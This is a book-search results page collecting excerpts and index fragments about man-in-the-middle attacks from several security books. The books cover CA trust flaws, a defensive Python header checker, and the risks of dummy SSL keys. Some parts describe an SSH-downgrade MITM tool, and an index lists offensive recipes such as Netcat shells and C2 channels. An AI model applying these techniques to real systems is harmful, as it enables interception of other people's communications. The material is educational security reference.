MITM: man-in-the-middle

118 results back to index


Engineering Security by Peter Gutmann

active measures, algorithmic trading, Amazon Web Services, Asperger Syndrome, bank run, barriers to entry, bitcoin, Brian Krebs, business process, call centre, card file, cloud computing, cognitive bias, cognitive dissonance, combinatorial explosion, Credit Default Swap, crowdsourcing, cryptocurrency, Daniel Kahneman / Amos Tversky, Debian, domain-specific language, Donald Davies, Donald Knuth, double helix, en.wikipedia.org, endowment effect, fault tolerance, Firefox, fundamental attribution error, George Akerlof, glass ceiling, GnuPG, Google Chrome, iterative process, Jacob Appelbaum, Jane Jacobs, Jeff Bezos, John Conway, John Markoff, John von Neumann, Kickstarter, lake wobegon effect, Laplace demon, linear programming, litecoin, load shedding, MITM: man-in-the-middle, Network effects, Parkinson's law, pattern recognition, peer-to-peer, Pierre-Simon Laplace, place-making, post-materialism, QR code, race to the bottom, random walk, recommendation engine, RFID, risk tolerance, Robert Metcalfe, Ruby on Rails, Sapir-Whorf hypothesis, Satoshi Nakamoto, security theater, semantic web, Skype, slashdot, smart meter, social intelligence, speech recognition, statistical model, Steve Jobs, Steven Pinker, Stuxnet, telemarketer, text mining, the built environment, The Death and Life of Great American Cities, The Market for Lemons, the payments system, Therac-25, too big to fail, Turing complete, Turing machine, Turing test, web application, web of trust, x509 certificate, Y2K, zero day, Zimmermann PGP

id=1580452. [132] “Windows Root Certificate Program Members”, Microsoft Corporation, 24 November 2009, http://support.microsoft.com/kb/931125. [133] “An Observatory for the SSLiverse”, Peter Eckersley and Jesse Burns, presentation at Defcon 18, July 2010, http://www.eff.org/files/DefconSSLiverse.pdf [134] “Clarifying The Trustwave CA Policy Update”, TrustWave, 4 February 2012, http://blog.spiderlabs.com/2012/02/clarifying-the-trustwave-capolicy-update.html. [135] “Trustwave admits crafting SSL snooping certificate”, John Leyden, 8 February 2012, http://www.theregister.co.uk/2012/02/09/tustwave_disavows_mitm_digital_cert. [136] “Trustwave admits issuing man-in-the-middle digital certificate; Mozilla debates punishment”, Lucian Constantin, 8 February 2012, http://www.computerworld.com/s/article/9224082/Trustwave_admits_i ssuing_man_in_the_middle_digital_certificate_Mozilla_debates_punishment. [137] “Remove Trustwave Certificate(s) from trusted root certificates”, Patrick Tate, 8 February 2012, https://bugzilla.mozilla.org/show_bug.cgi?id=724929#c20. [138] “Remove Trustwave Certificate(s) from trusted root certificates”, Sebastian Wiesinger, 7 February 2012, https://bugzilla.mozilla.org/show_bug.cgi?

Mind you Apple didn’t just trust Verisign-issued certificates but any certificates that users dropped onto their devices, so that it was possible to bypass the payment system in Apple’s app store by installing your own CA certificate on your iPhone, iPad, or Mac and having it “validate” purchases through you rather than the real app store [239][240][241][242]11 (the fact that Apple took precautions to protect against outsiders but not against their own users is an example of projection bias, covered in more detail in “Confirmation Bias and other Cognitive Biases” on page 145). More than a year later the same issue was still present in Apple’s iMessage system, which trusted any CA-issued certificate (rather than only ones designated as being for the iMessage servers), allowing man-in-the-middle (MITM) attacks on communications with the iMessage servers. Since iMessage sends the AppleID and password in the clear (over the potentially MITM’d link), a single MITM on an iMessage communication would give an attacker access to the user’s iCloud accounts, backups, and everything else connected to their Apple account [243]. These problems were made even worse by the fact that the CA root certificate posted on Apple’s web site was for “Apple Root Certificate Authority” [244] while the iPhone one is for “Apple Root CA”, making it impossible to verify the certificates issued with it even if someone did track the other root certificate down to Apple’s web site because the certificates are identified as coming from a different CA (this has since been corrected after Apple were informed of the problem).

There are even automated attack tools around that enable this subversion of the fingerprint mechanism. The simplest attack, provided by a man-in-the-middle (MITM) tool called ssharpd [191], uses ARP redirection to grab an SSH connect attempt and then reports a different protocol version to the one that’s actually in use (it can get the protocol version from the information passed in the SSH handshake). 32 Problems Since SSHv1 and SSHv2 keys have different fingerprints, the victim doesn’t get the more serious key-changed warning but merely the relatively benign new-key warning. Since many users never check key fingerprints but simply assume that everything should be OK on the first connect, the attack succeeds and the ssharp MITM has access to the session contents [192]10. > ssh test@testbox The authenticity of host 'testbox (192.168.1.38)' can't be established.


pages: 224 words: 45,431

Python Web Penetration Testing Cookbook by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, Dave Mound

en.wikipedia.org, Kickstarter, Minecraft, MITM: man-in-the-middle, web application

This check will print a warning if the header is not set or if the response does not explicitly match to nosniff: try: contenttype = req.headers['X-Content-Type-Options'] if contenttype != 'nosniff': print 'X-Content-Type-Options not set properly' except: print 'X-Content-Type-Options not set' The next Strict-Transport-Security header is used to force communication over a HTTPS channel, to prevent man in the middle (MITM) attacks. The lack of this header means that the communication channel could be downgraded to HTTP by an MITM attack: try: hsts = req.headers['Strict-Transport-Security'] except: print 'HSTS header not set, MITM attacks may be possible' The final Content-Security-Policy header is used to restrict the type of resources that can load on the web page, for example, restricting where JavaScript can run: try: csp = req.headers['Content-Security-Policy'] print 'Content-Security-Policy set:', csp except: print 'Content-Security-Policy missing' The output from the recipe is shown in the following screenshot: Brute forcing login through the Authorization header Many websites use HTTP basic authentication to restrict access to content.

Index A alternative sitesidentifying, by spoofing user agents / Identifying alternative sites by spoofing user agents, How it works… Application Programming Interface (API)about / Gathering information using the Shodan API Atbash ciphercracking / Cracking the Atbash cipher, How it works… automated fuzzingabout / Automated fuzzing, How to do it…, How it works… automated URL-based Cross-site scripting / Automated URL-based Cross-site scripting, How it works…, Automated parameter-based Cross-site scripting, How to do it…, How it works…, There's more… automated URL-based Directory Traversal / Automated URL-based Directory Traversal, How it works… B Base64 encodingabout / Encoding with Base64, How it works… Bcrypt hashgenerating / Generating a Bcrypt hash, How to do it…, How it works… about / Generating a Bcrypt hash BeautifulSoup library / There’s more… blind SQL Injectionexploiting / Exploiting Blind SQL Injection, How it works… Boolean SQLiexploiting / Exploiting Boolean SQLi, How it works…, There's more… brute forcing loginthrough authorization header / Brute forcing login through the Authorization header, How it works…, There's more… C Capture The Flag (CTF) challenges / Encoding with ROT13 clickjackingabout / Testing for clickjacking vulnerabilities clickjacking vulnerabilitiestesting for / Testing for clickjacking vulnerabilities, How to do it…, How it works… commandenabling, steganography used / Getting ready, How to do it…, How it works… comma separated variables (CSV) / IntroductionNmap XML, converting to / Converting Nmap XML to CSV, Getting ready, How it works… Sslscan, parsing / Parsing Sslscan into CSV, How it works… commentssearching, in source code / Finding comments in source code, How it works…, There's more… common transfer files (CTFs) / Shellshock checking Common Vulnerabilities and Exposures (CVE) / How it works… controlenabling, steganography used / Enabling command and control using steganography, How to do it…, How it works… Cross-site scripting (XSS) / Introduction Cross Site Tracing (XST) / Testing HTTP methods D Damn Vulnerable Web App (DVWA) / How to do it… dataextracting, through HTTP requests / Extracting data through HTTP requests, How to do it…, How it works… Direct Object Reference (DOR) / Automated URL-based Directory Traversal E e-mail addressesgenerating, from names / Generating e-mail addresses from names, How to do it… searching, from web pages / Finding e-mail addresses from web pages, How it works…, There's more… e-mailsextracting, to Maltego / Extracting e-mails to Maltego, How it works… F filesenumerating / Enumerating files, How to do it…, How it works… FTP C2creating / Creating an FTP C2, How it works… FuzzDBURL / Getting ready fuzzingabout / Automated fuzzing G Google+ APIused, for downloading profile pictures / Downloading profile pictures using the Google+ API, How it works additional results, harvesting using pagination / How it works Google+ API searchscripting / Scripting a Google+ API search, How it works…, See also… Google+ pagination APIadditional results, harvesting using pagination / Harvesting additional results from the Google+ API using pagination graphsgenerating, plot.ly used / Generating graphs using plot.ly, How it works… H hashesidentifying / Identifying hashes, How it works… header based Cross-site scriptingabout / Header-based Cross-site scripting, How it works…, See also Hide_message functionabout / How it works… carrier parameter / How it works… message parameter / How it works… outfile parameter / How it works… HTTP C2creating / Creating an HTTP C2, Getting Started, How it works… HTTP headersservers, fingerprinting through / Fingerprinting servers through HTTP headers, How it works…, There's more… HTTP methodstesting / Testing HTTP methods, How it works…, There's more… HTTP requestsdata, extracting through / Extracting data through HTTP requests, How to do it…, How it works… HTTP RFC handyURL / Introduction I ImgurURL / Getting ready informationobtaining, Shodan API used / Getting ready, How to do it…, How it works…, There's more… insecure cookie flagstesting for / Testing for insecure cookie flags, How it works…, There's more… insecure headerstesting for / Testing for insecure headers, How it works… Internet Control Message Protocol (ICMP) packet / Performing a ping sweep with Scapy Intrusion Detection System (IDS) / Enabling command and control using steganography J jitterchecking / Checking jitter, How to do it…, How it works… about / Checking jitter jQuery checkingabout / jQuery checking, How it works…, There's more… K 10k common passwords, GitHubreference / Getting ready L least significant bit (LSB)about / Introduction linear congruential generatorpredicting / Predicting a linear congruential generator , Getting ready, How it works… linksextracting, from URL to Maltego / Extracting links from a URL to Maltego, How it works… LSB steganographyused, for hiding message / Hiding a message using LSB steganography, How to do it…, How it works… M Maltegolinks, extracting from URL / Extracting links from a URL to Maltego, How it works… e-mails, extracting to / Extracting e-mails to Maltego, How it works… man in the middle (MITM) attacks / How it works… MD5 hashabout / Generating an MD5 hash generating / How to do it…, How it works… cracking / Cracking an MD5 hash, How to do it…, How it works… messagehiding, LSB steganography used / Hiding a message using LSB steganography, How to do it…, How it works… extracting, hidden in LSB / Extracting messages hidden in LSB, How it works… N Network Time Protocol (NTP) / Converting Nmap XML to CSV Nmapabout / Converting Nmap XML to CSV Nmap XMLconverting, to CSV / Converting Nmap XML to CSV, Getting ready, How it works… Not Safe For Work (NSFW) tag / Encoding with ROT13 O one-time pad reuseattacking / Attacking one-time pad reuse, Getting ready, How it works… online CVE databasesreference / There's more… Open Source Intelligence (OSINT)about / Introduction / Introduction Open Web Application Security Project (OWASP) / Introduction P paginationused, for harvesting additional results from Google+ API / Harvesting additional results from the Google+ API using pagination, How it works passwordsbrute forcing / Brute forcing passwords, How to do it…, How it works… payloadsencoding / Encoding payloads, How it works… PHPSESSIONURL / There's more… pingsweepperforming, Scapy used / Performing a ping sweep with Scapy, How to do it…, How it works… plot.lyused, for generating graphs / Generating graphs using plot.ly, How it works… profile picturesdownloading, Google+ API used / Downloading profile pictures using the Google+ API, How it works Python Image Library (PIL) / Getting ready Q QtWebKitused, for obtaining website screenshots / Getting screenshots of websites with QtWebKit, How it works… about / Getting ready R regular expressions (Regex) / Identifying hashes ROT13 encodingabout / Encoding with ROT13 using / How to do it…, How it works… S Scapyused, for performing pingsweep / Performing a ping sweep with Scapy, How it works… about / Performing a ping sweep with Scapy scanning with / Scanning with Scapy, How it works… URL / There's more… screenshotsbased on port list / Screenshots based on a port list, How it works…, There's more… Security Operation Centre (SOC) analyst / Creating an Twitter C2 serversfingerprinting, through HTTP headers / Fingerprinting servers through HTTP headers, How it works…, There's more… session fixationabout / Session fixation through a cookie injection through cookie injection / Session fixation through a cookie injection, How it works…, There's more… SHAimplementing, in real-world scenario / Implementing SHA in a real-world scenario, How it works… SHA 1/128/256 hashgenerating / Generating an SHA 1/128/256 hash, How it works… SHA and MD5 hashesimplementing together / Getting ready, How it works… Shellshock checkingabout / Shellshock checking, How it works… Shodanabout / Gathering information using the Shodan API URL / Gathering information using the Shodan API Shodan APIused, for obtaining information / Gathering information using the Shodan API, How to do it…, How it works…, There's more… simple Netcat shellcreating / Creating a simple Netcat shell, How it works… SoupStrainer / There’s more… SQL Injectionabout / Introduction SQLi test pagesreference / There's more… Sslscanabout / Parsing Sslscan into CSV parsing, into CSV / Parsing Sslscan into CSV, How it works… standard twitter APIURL / How it works… steganographyabout / Introduction used, for enabling command and control / Enabling command and control using steganography, How to do it…, How it works… substitution ciphercracking / Cracking a substitution cipher, How it works… T texthiding, in images / Hiding text in images, How it works…, There's more… extracting, from images / Extracting text from images, How it works…, There's more… TRACE / Testing HTTP methods Twitter C2creating / Creating an Twitter C2, How to do it…, How it works… U URL-based SQLiidentifying / Identifying URL-based SQLi, How to do it…, How it works…, There's more… usernamesbrute forcing / Brute forcing usernames, How to do it…, How it works… username validitychecking / Checking username validity, Getting ready, How it works… W Web App Firewalls (WAFs) / Encoding payloads websitesspidering / Spidering websites, How it works… website screenshotsobtaining, QtWebKit used / Getting screenshots of websites with QtWebKit, How to do it…, How it works… Wikipedia page on ANSIURL / How it works…

= '1; mode=block': print 'X-XSS-Protection not set properly, XSS may be possible:', xssprotect except: print 'X-XSS-Protection not set, XSS may be possible' try: contenttype = req.headers['X-Content-Type-Options'] if contenttype != 'nosniff': print 'X-Content-Type-Options not set properly:', contenttype except: print 'X-Content-Type-Options not set' try: hsts = req.headers['Strict-Transport-Security'] except: print 'HSTS header not set, MITM attacks may be possible' try: csp = req.headers['Content-Security-Policy'] print 'Content-Security-Policy set:', csp except: print 'Content-Security-Policy missing' print '----' How it works… This recipe is configured for testing many sites, so the first part reads in the URLs from the text file and prints out the current target: urls = open("urls.txt", "r") for url in urls: url = url.strip() req = requests.get(url) print url, 'report:' Each header is then tested inside a try/except block.


Linux Security Cookbook by Daniel J. Barrett, Richard E. Silverman, Robert G. Byrnes

Debian, GnuPG, MITM: man-in-the-middle, web of trust

DROP, refusing packets with disabling TCP service invocation by remote request inserting firewall rules in particular position listing firewall rules logging and dropping certain packets permitting incoming SSH access only preventing pings protecting dedicated server restricting telnet service access by source address simulating packet traversal through to verify firewall operation testing firewall configuration ipchains-restore loading firewall configuration ipchains-save checking IP addresses saving firewall configuration viewing rules with IPSec iptables --syn flag to process TCP packets blocking access for particular remote host for a particular service blocking access for some remote hosts but not others blocking all access by particular remote host blocking all incoming HTTP traffic blocking incoming HTTP traffic while permitting local HTTP traffic blocking incoming network traffic blocking outgoing access to all web servers on a network blocking outgoing Telnet connections blocking outgoing traffic blocking outgoing traffic to particular remote host blocking remote access, while permitting local blocking spoofed addresses building chain structures controlling access by MAC address default policies deleting firewall rules disabling reverse DNS lookups (-n option) disabling TCP service invocation by remote request DROP and REJECT, refusing packets with error packets, tailoring inserting firewall rules in particular position listing firewall rules permitting incoming SSH access only preventing pings protecting dedicated server restricting telnet service access by source address rule chain for logging and dropping certain packets testing firewall configuration website iptables-restore loading firewall configuration iptables-save checking IP addresses saving firewall configuration viewing rules with IPv4-in-IPv6 addresses, problems with ISP mail servers, acceptance of relay mail issuer (certificates) self-signed [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] John the Ripper (password-cracking software) dictionaries for download site wordlist directive [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] kadmin utility adding Kerberos principals to IMAP mail server adding users to existing realm modifying KDC database for host running on new host setting server to start at boot kadmind command (Kerberos) kaserver (Andrew Filesystem) kdb5_util command (Kerberos) KDC [See Key Distribution Center] KDE applications, certificate storage Kerberos authentication in /etc/pam.d startup file hosts, adding to existing realm IMAP, using with Key Distribution Centers (KDCs) ksu ksu command PAM, using with without passwords POP, using with setting up MIT Kerberos-5 KDC sharing root privileges via SSH, using with debugging SSH-1 protocol Telnet, using with users, adding to existing realm web site (MIT) KerberosTgtPassing (in sshd_config) kernel /proc files and collection of messages from by system logger enabling source address verification IP forwarding flag ipchains (Versions 2.2 and up) iptables (Versions 2.4 and up) process information recorded on exit runtime integrity checkers source address verification, enabling Key Distribution Center (KDC), setting up for MIT Kerberos-5 keyring files (GnuPG) adding keys to viewing keys on information listed for keys keys, cryptographic [See also cryptographic authentication] adding to GnuPG keyring backing up GnuPG private key dummy keypairs for imapd and pop3d encrypting files for others with GnuPG generating key pair for GnuPG GnuPG, viewing on your keyring key pairs in public-key encryption keyring files for GnuPG keys obtaining from keyserver and verifying OpenSSH programs for creating/using PGP keys, using in GnuPG revoking a public key sharing public keys securely Tripwire viewing on GnuPG keyring keyserver adding key to informing that a public keys is no longer valid obtaining keys from uploading new signatures to killing processes authorizing users to kill via sudo command pidof command, using terminating SSH agent on logout kinit command (Kerberos) 2nd 3rd -f option (forwardable credentials) klist command (Kerberos) 2nd known hosts database (OpenSSH server) kpasswd command (Kerberos) krb5.conf file, copying to new Kerberos host krb5.keytab file krb5kdc kstat (integrity checker) ksu (Kerberized su) authentication via Kerberos sharing root privileges via [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] last command 2nd lastb command lastcomm utility bugs in latest version lastdb command lastlog command databases from several systems, merging multiple systems, monitoring problems with ldd command libnet (toolkit for network packet manipulation) libnids (for TCP stream reassembly) libpcap (packet capture library) 2nd binary files Snort logging directory, creating in logging Snort data to libpcap-format files network trace files, ngrep Snort, use by libwrap, using with xinetd Linux /proc filesystem differing locations for binaries and configuration files in distributions encryption software included with operating system vulnerabilities Red Hat [See Red Hat Linux] supported distributions for security recipes SuSE [See SuSE Linux] ListenAddress statements, adding to sshd_config listfile module (PAM) ACL file entries local acces, permitting while blocking remote access local facilities (system messages) local filesystems, searching local key (Tripwire) creating with twinstall.sh script fingerprints, creating in secure integrity checks read-only integrity checking local mail (acceptance by SMTP server) local password authentication, using Kerberos with PAM localhost problems with Kerberos on SSH SSH port forwarding, use in unsecured mail sessions from logfile group configuration file (logwatch) logger program writing system log entries via shell scripts and syslog API logging access to services combining log files firewalls, configuring for nmap -o options, formats of PAM modules, error messages rotating log files service access via xinetd shutdowns, reboots, and runlevel changes in /var/log/wtmp Snort 2nd to binary files partitioning into separate files permissions for directory stunnel messages sudo command remotely system [See system logger] testing with nmap stealth operations loghost changing remote logging of system messages login shells, root logins adding another Kerberos principal to your ~/.k5login file Kerberos, using with PAM monitoring suspicious activity printing information about for each user recent logins to system accounts, checking testing passwords for strength CrackLib, using John the Ripper, using logouts, history of all on system logrotate program 2nd 3rd logwatch filter, defining integrating services into listing all sudo invocation attempts scanning log files for messages of interest scanning Snort logs and sending out alerts scanning system log files for problem reports lsh (SSH implementation) lsof command +M option, (for processes using RPC services) -c option (command name for processes) -i option (for network connections) -p option (selecting processes by ID) -u option (username for processes) /proc files, reading IP addresses, conversion to hostnames network connections for processes, listing [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] m4 macro processor MAC addresses controlling access by spoofed mail [See email IMAP POP] Mail application (Mozilla) mail clients connecting to mail server over SSL support for secure POP and IMAP using SSL mail facility (system messages) mail servers receiving Internet email without visible server support for SSL testing SSL connection locally Mailcrypt mc-deactivate-passwd to force passphrase erasure official web site using with GnuPG mailpgp (script for encrypting/sending email) mailsnarf command -v option, capturing only unencrypted messages malicious program, /tmp/ls man-in-the-middle (MITM) attacks dsniff, proof of concept with self-signed certificates, risk of services deployed with dummy keys manual integrity checks mask format, CIDR Massachusetts Institute of Technology (MIT) Kerberos matching anything (ALL keyword) 2nd max_load keyword (xinetd) 2nd mc-encrypt function MD5 checksum verifying for RPM-installed files merging system log files MH (mail handler) mirroring a set of files securely between machines MIT Kerberos MITM [See man-in-the-middle attacks] modules PAM CrackLib listfile 2nd pam_stack Perl Sys::Lastlog and Sys::Utmp Sys::Syslog XML::Simple monitoring systems for suspicious activity account use checking on multiple systems device special files directing system messages to log files displaying executed commands executed command, monitoring filesystems searching effectively finding accounts with no password finding superuser accounts finding writable files insecure network protocols, detecting local network activities log files, combining logging login passwords logins and passwords logwatch filter for services not supported lsof command, investigating processes with network-intrusion detection with Snort 2nd decoding alert messages logging output partitioning logs into files ruleset, upgrading and tuning networking observing network traffic with Ethereal GUI open network ports, testing for packet sniffing with Snort recovering from a hack rootkits rotating log files scanning log files for problem reports search path, testing searching for strings in network traffic security incident report, filing sending messages to system logger setuid and setgid programs, insecure syslog configuration, testing syslog messages, logging remotely tracing processes writing system log entries shell scripts with C with Perl scripts monitoring tools for networks NIH page web page information on morepgp (script for decrypting/reading email) mount command -o nodev (prohibiting device special files) grpid option noexec option nosuid option setuid and setgid programs, protecting against misuse mounts file (/proc) Mozilla certificate storage encrypted mail with Mail & Newsgroups Muffet, Alec (Crack utility) multi-homed hosts firewall for SSH client, problems with canonical hostname multi-homed server machines, socket mail server is listening on multicast packets multithreaded services (in inetd.conf) mutt mailer home web page securing POP/IMAP with SSL [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] NAMEINARGS flag for xinetd NAT gateway, canonical client hostname and National Infrastructure Protection Center (NIPC) (U.S.)

This setup is fine for testing, but do not use these certificates for a production system. These keys are distributed with every Red Hat system: they are public knowledge. If you deploy a service using default, dummy keys, you are vulnerable to a man-in-the-middle (MITM) attack, in which the attacker impersonates your system using the well-known dummy private keys. Furthermore, the name in the certificate does not match your server's hostname, and the certificate is not issued by a recognized Certifying Authority; both of these conditions will be flagged as warnings by your mail client. [Recipe 4.4] To preserve the server authentication and MITM resistance features of SSL, generate a new key for your mail server, and obtain an appropriate certificate binding the key to your server's name. [Recipe 4.7][Recipe 4.8] You can control how imapd performs password validation by means of PAM.

(period), in search path .gpg suffix (binary encrypted files) .shosts file / (slash), beginning absolute directory names /dev directory /dev/null, redirecting standard input from /proc files filesystems networking, important files for (/proc/net/tcp and /proc/net/udp) /sbin/ifconfig /sbin/ifdown /sbin/ifup /tmp/ls (malicious program) /usr/share/ssl/cert.pem file /var/account/pacct /var/log/lastlog /var/log/messages /var/log/secure unauthorized sudo attempts, listing /var/log/utmp /var/log/wtmp : (colons), current directory in empty search path element @ character, redirecting log messages to another machine @otherhost syntax, syslog.conf ~/.ssh directory, creating and setting mode ~/.ssh/config file [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] absolute directory names access control lists (ACLs), creating with PAM access_times attribute (xinetd) accounting [See process accounting] acct RPM accton command (for process accounting) addpol command (Kerberos) administrative privileges, Kerberos user administrative system, Kerberos [See kadmin utility] agents, SSH [See also ssh-agent] forwarding, disabling for authorized keys terminating on logout using with Pine Aide (integrity checker) alerts, intrusion detection [See Snort] aliases for hostnames changing SSH client defaults for users and commands (with sudo) ALL keyword user administration of their own machines (not others) AllowUsers keyword (sshd) Andrew Filesystem kaserver ank command (adding new Kerberos principal) apache (/etc/init.d startup file) append-only directories apply keyword (PAM, listfile module) asymmetric encryption 2nd [See also public-key encryption] attacks anti-NIDS attacks buffer overflow detection with ngrep indications from system daemon messages dictionary attacks on terminals dsniff, using to simulate inactive accounts still enabled, using man-in-the-middle (MITM) risk with self-signed certificates services deployed with dummy keys operating system vulnerability to forged connections setuid root program hidden in filesystems on specific protocols system hacked via the network vulnerability to, factors in attributes (file), preserving in remote file copying authconfig utility imapd, use of general system authentication Kerberos option, turning on AUTHENTICATE command (IMAP) authentication cryptographic, for hosts for email sessions [See email IMAP] interactive, without password [See ssh-agent] Internet Protocol Security (IPSec) Kerberos [See Kerberos authentication] OpenSSH [See SSH] PAM (Pluggable Authentication Modules) [See PAM] SMTP [See SMTP] specifying alternate username for remote file copying SSH (Secure Shell) [See SSH] SSL (Secure Sockets Layer) [See SSL] by trusted host [See trusted-host authentication] authentication keys for Kerberos users and hosts authorization root user ksu (Kerberized su) command multiple root accounts privileges, dispensing running root login shell running X programs as SSH, use of 2nd sudo command sharing files using groups sharing root privileges via Kerberos via SSH sudo command allowing user authorization privileges per host bypassing password authentication forcing password authentication granting privileges to a group killing processes with logging remotely password changes read-only access to shared file restricting root privileges running any program in a directory running commands as another user starting/stopping daemons unauthorized attempts to invoke, listing weak controls in trusted-host authentication authorized_keys file (~/.ssh directory) forced commands, adding to authpriv facility (system messages) [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] backups, encrypting bash shell process substitution benefits of computer security, tradeoffs with risks and costs Berkeley database library, use by dsniff binary data encrypted files libpcap-format files searching for with ngrep -X option binary format (DER), certificates converting to PEM binary-format detached signature (GnuPG) bootable CD-ROM, creating securely broadcast packets btmp file, processing with Sys::Utmp module buffer overflow attacks detection with ngrep indicated by system daemon messages about names [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] C programs functions provided by system logger API writing to system log from 2nd CA (Certifying Authority) setting up your own for self-signed certificates SSL Certificate Signing Request (CSR), sending to Verisign, Thawte, and Equifax CA.pl (Perl script) cage, chroot (restricting a service to a particular directory) canonical hostname for SSH client finding with Perl script inconsistencies in capture filter expressions Ethereal, use of CERT Coordination Center (CERT/CC), incident reporting form cert.pem file adding new SSL certificate to validating SSL certificates in certificates generating self-signed X.509 certificate revocation certificates for keys distributing SSL converting from DER to PEM creating self-signed certificate decoding dummy certificates for imapd and pop3d generating Certificate Signing Request (CSR) installing new mutt mail client, use of setting up CA and issuing certificates validating verifying 2nd testing of pre-installed trusted certificates by Evolution Certifying Authority [See CA] certutil challenge password for certificates checksums (MD5), verifying for RPM-installed files chkconfig command enabling load commands for firewall KDC and kadmin servers, starting at boot process accounting packages, running at boot Snort, starting at boot chkrootkit program commands invoked by chmod (change mode) command 2nd preventing directory listings removing setuid or setgid bits setting sticky bit on world-writable directory world-writable files access, disabling chroot program, restricting services to particular directories CIAC (Computer Incident Advisory Capability), Network Monitoring Tools page Classless InterDomain Routing (CIDR) mask format client authentication [See Kerberos PAM SSH SSL trusted-host authentication] client programs, OpenSSH closelog function using in C program colons (:), referring to current working directory command-line arguments avoiding long prohibiting for command run via sudo Common Log Format (CLF) for URLs Common Name self-signed certificates compromised systems, analyzing Computer Emergency Response Team (CERT) Computer Incident Advisory Capability (CIAC) Network Monitoring Tools page computer security incident response team (CSIRT) copying files remotely name-of-source and name-of-destination rsync program, using scp program remote copying of multiple files CoronerÕs Toolkit (TCT) cps keyword (xinetd) Crack utility (Alec Muffet) cracking passwords CrackLib program, using 2nd John the Ripper software, using CRAM-MD5 authentication (SMTP) credentials, Kerberos forwardable listing with klist command obtaining and listing for users cron utility authenticating in jobs cron facility in system messages integrity checking at specific times or intervals restricting service access by time of day (with inetd) secure integrity checks, running crypt++ (Emacs package) cryptographic authentication for hosts Kerberos [See Kerberos authentication] plaintext keys using with forced command public-key authentication between OpenSSH client and SSH2 server, using OpenSSH key between OpenSSH client and SSH2 server, using SSH2 key between SSH2 client/OpenSSH server with ssh-agent SSH [See SSH] SSL [See SSL] by trusted hosts [See trusted-host authentication] cryptographic hardware csh shell, terminating SSH agent on logout CSR (Certificate Signing Request) passphrase for private key current directory colons (:) referring to Linux shell scripts in CyberTrust SafeKeyper (cryptographic hardware) [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] daemons IMAP, within xinetd imapd [See imapd] inetd [See inetd] Kerberized Telnet daemon, enabling mail, receiving mail without running POP, enabling within xinetd or inetd sendmail, security risks with visibility of Snort, running as sshd [See sshd] starting/stopping via sudo tcpd using with inetd using with xinetd Telnet, disabling standard xinetd [See xinetd] dangling network connections, avoiding date command DATE environment variable datestamps, handling by logwatch Debian Linux, debsums tool debugging debug facility, system messages Kerberized authentication on Telnet Kerberos authentication on POP Kerberos for SSH PAM modules SSL connection problems from server-side dedicated server, protecting with firewall denial-of-service (DOS) attacks preventing Snort detection of vulnerability to using REJECT DENY absorbing incoming packets (ipchains) with no response pings, preventing REJECT vs.


Service Design Patterns: Fundamental Design Solutions for SOAP/WSDL and RESTful Web Services by Robert Daigneau

Amazon Web Services, business intelligence, business process, continuous integration, create, read, update, delete, en.wikipedia.org, fault tolerance, loose coupling, MITM: man-in-the-middle, MVC pattern, pull request, RFC: Request For Comment, Ruby on Rails, software as a service, web application

Lost-Update Problem—Occurs when two clients attempt to update the same resource at roughly the same time. Consider the case where client A and client B both retrieve data on customer C at the same time. Let’s say client A updates and saves this record, then client B does the same. If client A immediately reads the data on customer C again, it may appear as though their update was lost because they now see client B’s updates. Man-in-the-Middle Attack (MITM)—Occurs when a third party intercepts communications between a client and service. In the case of web services, the malicious party co-opts the TCP connection between the client and the server. The end result is that the client has a connection to the middleman, which also has a connection to the target service. The middleman may silently eavesdrop on the conversation to acquire information, or inject commands to alter the flow of the conversation.

See also Response time Datasource Adapter, 140–141 definition, 285 Request Mapper, 113 web service API styles, 16 Layered systems, 46 Leveraging commodity caching technologies, 45 Linked Services adding/removing services, 79 address formatting, 79 benefits of, 78–79 breaking clients, avoiding, 79 description, 53 effects on web service evolution, 265 examples, 80–82 overview, 77–79 Response Mapper, 125–126 use for, 53 Web service calls, sequence of, 77 workflow guidance, 78–79 Linked Services, considerations hyperlinks, 80 security, 80 using with Resource APIs, 79–80 Load balancing, 5–6, 285–286 Local objects, 3–6 Location transparency, 22, 173–174 Loggers, intercepting, 201–303. See also Service Interceptor Long-running processes, 188. See also Workflow Connector Loose coupling, 9–10 Lost Update Problem, 49, 286 M Man-in-the-Middle Attack (MITM), 286 Mapper [POEAA], 272. See also Request Mapper; Response Mapper Marshal. See Serializing data Media preferences. See Media Type Negotiation Media Type Negotiation content negotiation, 71–73 description, 53 media type preferences, 70 overview, 70–73 Request Handler, selecting, 71–72 URIs, as file extensions, 70 use for, 53 Media Type Negotiation, considerations client-driven negotiations vs.

